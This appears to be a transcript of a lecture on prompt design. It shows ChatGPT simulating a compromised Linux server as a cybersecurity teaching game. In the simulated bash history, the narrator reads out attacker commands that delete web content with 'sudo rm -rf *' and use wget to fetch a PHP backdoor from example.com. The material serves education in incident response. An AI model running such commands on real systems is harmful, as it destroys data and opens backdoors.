The capabilities of ChatGPT are vastly being undersold. And I want to give you an example that really showcases the power of ChatGPT and that it can perform much more complex tasks than we can imagine. Now, I've already gone through and run through a sequence of prompts and generated all of the outputs. But I'm going to step you through this output, and I'm not going to wait for it in real time because I want to have time to discuss what's the actual content of what's being generated, because that's the really, really important piece. Is we can look at the prompts that we've given it, we can talk about the prompt design, but then we can see the power of ChatGPT in the responses that it's giving us. So we're going to go ahead and dive in here to this example, which I think is a great example for training and thinking about education. So you can imagine that you want to teach somebody about cybersecurity. So a lot of times we have students that come into my class that aren't really experienced with the Linux terminal or how you might use different artifacts on a Linux system to learn about cybersecurity, how they might be important in cybersecurity response or trying to understand what's going on in a system. So what I would really like to be able to do is create an interactive simulation or game for my students to be able to learn Linux commands, learn the layout of a Linux system, and be able to understand what are important capabilities, files, aspects of that system from a cybersecurity perspective. And if you were responding to an incident or you were trying to investigate some type of anomaly, what would you go and do on that system? So I've developed a prompt up here that we can see, and we're going to go ahead and start off by looking at this prompt and reading through it. So we are going to play a cybersecurity game. You're going to pretend to be a Linux terminal for a computer that has been compromised by an attacker. Now, there have been a lot of discussion on the internet about this example of asking it to pretend to be a Linux terminal, and it's really fascinating. I refer you to some of that discussion, but we're going to go a little more specific on this, and the more sort of extra context that we're giving ChatGPT is going to give it some amazing capabilities beyond what we've seen with the Linux terminal example. So we're asking it to be a Linux terminal, but we're going to be a terminal that has been compromised by a Linux by some attacker. We're on a Linux system. We've got a terminal that's like giving us a view into that Linux system, but we know the system has been attacked. So we're giving it this really interesting scenario. Now, this is an example of our persona pattern that we've discussed, where we're giving the ChatGPT system a persona that we want it to take on in order for its output. Now, the next part of this is I'm going to say, when I type in a command, you are going to output the corresponding text that the Linux terminal would produce. So we're telling ChatGPT, you're going to be a Linux system, you're going to interpret what I type in as Linux commands, and you're going to give me the appropriate output. And we're going to see what it does with this in a minute. I'm going to use commands to try and figure out how the system was compromised. So now we're kind of giving it more context. We're telling it, what are we trying to accomplish as the user? And this is one of the important things when you're designing prompts for ChatGPT or a similar system, is you want to explain to it whenever possible your goal. What are you trying to achieve? Because often that can help it tailor its output so you can get a response that is going to be more helpful to you. And then the next thing is I'm saying the attack should have done one or more of the following things. It should have launched new processes, changed files, opened new ports to receive communication, created new outbound connections, changed passwords, created new user accounts, or read and stolen information. So now we've told it, you are a Linux machine. You're giving me a terminal to go and investigate this cybersecurity incident. And on top of it, here are the things that we would like, the boundaries for that incident, the types of things we want to have happened to the machine that you're going to be imitating. This is a very, very complex persona that we are asking ChatGPT to take on. And then the final part of it is to start the game, print a scenario of what happened that led to my investigation, and make the description have clues that I can use to get started. So now we're giving the user, the person that is learning about cybersecurity response, learning about Linux terminals, we are giving them the text, the storyline behind this to help draw them into this simulation or game that we're creating. And so let's look at ChatGPT's response. Sure, let's get started with the cybersecurity game. Here's the scenario. You are the system administrator of a company's Linux server which hosts critical data and applications. One day you notice some unusual activity on the server, and after investigating, you find that the server has been compromised. You suspect that an attacker gained access to the server by exploiting a vulnerability in one of the applications hosted on the server. You also suspect that the attacker might have used the server as a jumping off point to launch attacks on other systems. As you start your investigation, you notice some suspicious activity in the logs. You see that there are multiple failed login attempts for the root user from different IP addresses. You also see that there are some new processes running on the server that you do not recognize. Additionally, you notice that there are some new user accounts in the system that you did not create. Using these clues, you start your investigation to figure out how the system was compromised and what the attacker did on the server. Now, you notice we gave it a scenario, and it's generated this whole world for us that we are now engaged in moving into. And think about the complexity of accomplishing the same thing without ChatGPT. Now, we're going to really think about that complexity in a minute when we start seeing what it's doing. So we started off with a paragraph of text, and we have already been led into a really complex scenario where it is dreaming up the content. In fact, if you look at this, just the initial content scenario that it generated is longer than the prompt that I gave it. So we've already had a productivity boost. It is a intelligence amplifier. It is a creativity multiplier if you use the tool correctly. And so we've taken some simple things. We've taken the gameplay pattern of generating prompts. We've taken the persona pattern. We're putting them together into this scenario, and now we've got a really complex capability. So let's look at the first thing we do. Well, the first thing I want to do in this system is I want to orient myself. I want to know, where am I in this system? So I'm going to type in the Linux command pwd, which is print working directory. I want to know, where have you dropped me into this system? Where am I in the file system? And from that, then I can go and start my exploration. And so I type in pwd, and here's the amazing immediate impact of that. One, it's providing an explanation of what the commands are that I'm running. So in this case, it's telling me that the pwd command stands for print working directory, which is amazing. We would expect it to be able to do that. It can answer, it's been touted as the help for all high school students to cheat on exams, but it's so much more powerful and capable in that. And that's unfortunately the worst way in the world to think about ChatGPT. But it can answer basic questions. So it sees I'm running pwd, explains it to me, but here's where it gets interesting. And this is what we've seen on the internet. It generates a directory that I'm currently in. I'm in the home/user directory. So some fictitious user, I am now in their home directory. And so I've been brought into this scenario. I'm now inside that computer interacting with it. Now, the key thing to remember is all we did is gave ChatGPT a paragraph of information. And now I've been drawn into a cybersecurity simulation that's going to teach me about the Linux terminal and different Linux artifacts that are important. And now I'm inside the home directory. Okay, so what do I do next? Well, the first thing I think is, well, let me know what files are in that directory. Maybe there's some evidence there that I can go and look at or start my investigation. So I say ls-alt. This is going to give me a listing of files. And it's also going to give me a listing in a particular format. And let's see, can it understand that command? Can it do something interesting with it? And what we see is, yes, it can. It tells us what the command is. It properly tells us what each of the flags within that command do. This in itself is incredibly powerful and useful. Like, you can imagine you're trying to learn about Linux commands, you're typing things in, you've seen them on the internet, you don't fully understand what they do, but every time you type something in, it's giving you a full and detailed explanation of what you're doing and what it's going to provide you. But here's where it gets really interesting, and I want to draw your attention to this file listing, because this file listing is where the real magic happens of ChatGPT, and where we can see that this is a capability far beyond what we are looking at. If we just think about it about answering a bunch of quiz questions, if we just think about it as like the equivalent of an internet search, we're doing a great disservice to ChatGPT. So take a look at what we've got. We've got a file listing. That in itself is very amazing, because we've got a file listing for the home user directory for this cybersecurity simulation. So we know that we are in a simulation of a computer that's been the victim of a cyber attack. And we know there's something about logs and that you noticed in the scenario that you were brought in because there was suspicious activity in the logs. And what do we see in this file listing? It's absolutely amazing as we see log files. In particular, we see the bash history file. Now, if you're not familiar with Linux and what this means, it means that this ChatGPT session is pretending to be a Linux terminal. It's pretending to be a Linux terminal that was, or a Linux system that was attacked by a cyber attacker that had log files that are meaningful for cybersecurity. And this file listing shows bash history, and bash history is a really meaningful log file in this case because bash history gives us the list of commands, that the history of commands that this particular user has run. So you can imagine if somebody broke into the system under this user account and they started running different Linux commands, terminal commands to try to make something happen, this would give us a record or a log, a history of what they did, so we could try to trace back and understand what did this cyber attack do to this machine. And ChatGPT has generated this log. Now let's take a minute and just contemplate the depth of what's just happened. We took a paragraph of text describing a scenario, and we're now down to simulating a machine that has been hacked. And it's generating the right artifacts. The artifacts even go along with the narrative that it's giving us. So let's look at this file. We just have to do it. Like, surely it isn't going to have something interesting in it. So I'm going to cat.bash history. This is basically going to take the contents of that bash history file and print them out to the terminal so we can look at it. What is in this bash history file? Are we going to find evidence of a cyber attack? We already know the answer. Of course we are. It's ChatGPT. This is absolutely amazing. So look what we do. So we look in this log file, and the first line of this is somebody logged into the system and they changed into the var www HTML directory. What is this directory? Well, if you were running a web server on a system, that you would probably put the content for your web server in the var www HTML directory. So this attacker has got something happening here. They've logged in, they've changed into the directory of this web server. Now what do we see them doing? Sudo rm-rf star. They're deleting all of the data within the web directory. They're deleting all the data of all the files that this web server is serving up. This is the beginning of an attack. It's the destruction of data. It's them starting to use the machine for some malicious purpose. And now it gets really interesting. They say sudo wget https example.com backdoor.php. So what this is doing is basically executing a command to download a backdoor written in PHP. This is going to be a file that now is going to be served by the web server running on this Linux server. So not only have we had this whole scenario, we've been able to go and interact with Linux commands, but we're already into a log file, a fake log file that's been generated by ChatGPT that has a very specific scenario where a user has gone, an attacker has gone in and wiped out what's in the web server's content directory in this var www HTML and replaced it with a backdoor that they could potentially use to gain access to the system remotely. And then they're going and doing some things you would also expect. They're making that backdoor executable. They're also making it writable, and some other things might not be the best practice for what they want to do, and then they're exiting the system. This is absolutely profound. We've started from a block of text describing what we want, and we've got a scenario where it's generated the text, the gaming text, this narrative that gets us excited, that gives us clues. It's responding to our commands. And not only is it responding to our commands, but it's responding to our commands with output that you would expect to see on a system that has had an attack that follows the narrative that we've got. So this is absolutely unbelievable. So what might we else do? We might go and look at that directory. We could do that and follow through with it. We could also go and look at a whole bunch of other things, but I'm going to scroll down to one that is also really interesting. So let's imagine I'm a student, and in that earlier log file, one of the commands that was there was netstat-tulnmp, and you can imagine you're thinking, well, what does that command do? Is that something interesting that I need to follow up on? Was that the attacker run thing, or is that something that maybe I ran in a prior discussion? And it tells us what it does with all the complex listing of flags, and then it tells us, hey, here's what's going on the system. It tells us all the open ports that are receiving connections. So we start off with the file system. That's pretty amazing that it can do that for the file system. But it's also going to tell us about what network connections this machine is receiving. And so if we look in here, we can see, different applications that are running. There's also this Python application that's running on port 5000. That might be interesting. It tells us down here, for example, that it's a custom application. You can go, and now you can imagine as a student, you would want to know, well, maybe I don't know the command. So like we started off assuming that you knew something about Linux commands. But we're in this interactive educational scenario, and we can also just go and say, how would I tell what process is listening to port 5000? Because maybe I want to know more about this Python code that's running there. And it tells us, okay, well, here's how you would do that. Here's the command you would run. And here's what the output might be. I could also go and do this other ways, and look for information about that process. And so if you'll notice up here in the output, we had this process that was looking at, that was running this Python. It was the process ID 1212. And what's interesting too, is if we go and run commands that look at that process and try to understand it. So in this case, I'm asking for a process listing, and I'm using grep to filter for that process ID. Again, this is mind-blowing that we've got actually piped commands here. We've got a chain of commands. They're going to have a complex behavior. It's telling us what our chain is doing. And here's the other thing. It remembers that the process 1212 was a Python 3 application running app.py, and it prints out the correct listing and information about that process. And so not only are we getting information about the file system, we're getting information about processes. It tells us things, we can get more information about the program and its origins, and it might help you identify if the program is legitimate or potentially malicious. And so not only is it giving us the explanation of like the commands, but it's telling us from a cybersecurity perspective, in the context of our game, why these commands might be useful, what this information might tell us, how we as a user could learn more through this game. So I just want to go back to the very beginning of this to emphasize the capabilities here. This is the text that I put in, this block of text. I didn't go in and I didn't say, here, there's going to be a file system, there's going to be a web server, they're going to have deleted all of the information in the web server directory, you're going to have to show a fake listing. No, I didn't tell it any of that. I didn't tell it, here's code that you can run to interpret bash commands. I didn't tell it, you should go in and explain all of the commands in the context of cybersecurity. I didn't give it any of that. I didn't say there's going to be a bash history log file with these commands. I didn't say that there's going to be evidence in the open ports of this custom application that might be malicious being run. I didn't say they're going to delete and install a backdoor in the web server. I just said, here's the scenario. We want to learn about Linux security. We want to play a game where the user is able to interact with this thing and learn and investigate this incident. And I've got this incredibly rich behavior that's being generated. Now, think of the level of complexity it would take to write a piece of software to mimic this. This might be a year of my time, maybe less. Maybe we could constrain it. But I bet you if I went and kept running commands and trying different things, this thing would keep growing and expanding, exploring, generating interesting things for me in a way that would be very, very difficult to match if we programmed our own simulation. And then you can imagine having to go and hand generate the content for that simulation, to describe all the relationships between the files, to describe just the simple concept of if you show a listing with a process, that process is going to have an ID. And that ID, then when they run commands that are based on that ID, they need to show information that is consistent with what happened earlier in the scenario. All of that is being done automatically for us from this simple prompt that we've given it. Now, this also shows us one of the other really important things. There are patterns that you can use in how you develop these prompts. We've done a lot of work here at Vanderbilt on cataloging these prompt patterns and how you use them to be more effective with ChatGPT. I encourage you to take a look at the comments, to look at the papers that we put together on this topic. And I look forward to showing you more and exploring more ChatGPT with you.